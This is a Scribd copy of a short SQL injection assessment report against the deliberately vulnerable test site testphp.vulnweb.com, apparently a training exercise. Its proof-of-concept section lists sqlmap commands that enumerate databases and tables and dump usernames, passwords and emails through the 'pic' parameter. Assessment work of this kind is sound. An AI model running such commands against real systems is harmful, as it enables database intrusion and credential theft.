Scribd
Upload
33 views4 pages

SQL Report

Uploaded by

haricatchme96
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
33 views4 pages

SQL Report

Uploaded by

haricatchme96
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

SQL Injection Vulnerability Assessment Report

Summary:
A critical SQL Injection vulnerability was detected in the web server–hosted
application on http://testphp.vulnweb.com
The vulnerability allows manipulation of database queries via unsanitized user input
sent through client requests.
This can lead to data theft, data modification, and potential server compromise.

Methodology:

✓ Reconnaissance and mapping of endpoints


✓ Manual and automated testing for SQL injection using:

SQLMap

✓ Verification of findings via controlled proof-of-concept exploits

Findings
Name: SQL Injection via the pic Parameter

Vulnerability Details

Vulnerability Name SQL Injection

Affected Parameter pic

Affected Page http://testphp.vulnweb.com/product.php?pic=2

Vulnerability Type Error-based SQL Injection

Severity Level High

Data Disclosure, Data Manipulation, Authentication


Impact
Bypass
SQL Injection Vulnerability Assessment Report

Proof of Concept
Detect & Enumerate DBMS Info
sqlmap -u "http://testphp.vulnweb.com/product.php?pic=2" –dbs –batch

Dump Tables from a Specific Database


sqlmap -u "http://testphp.vulnweb.com/product.php?pic=2" -D acuart –tables
SQL Injection Vulnerability Assessment Report

Extract data from a specific table


sqlmap -u "http://testphp.vulnweb.com/product.php?pic=2" -D acuart –T users –
columns

Password Cracking
sqlmap -u "http://testphp.vulnweb.com/product.php?pic=2" -D acuart –T users –C
uname,pass,email –dump –batch
SQL Injection Vulnerability Assessment Report

Recommendations
✓ Validate and Sanitize Input
✓ Disable Detailed Error Messages
✓ Keep Software Up to Date
✓ Use a Web Application Firewall

You might also like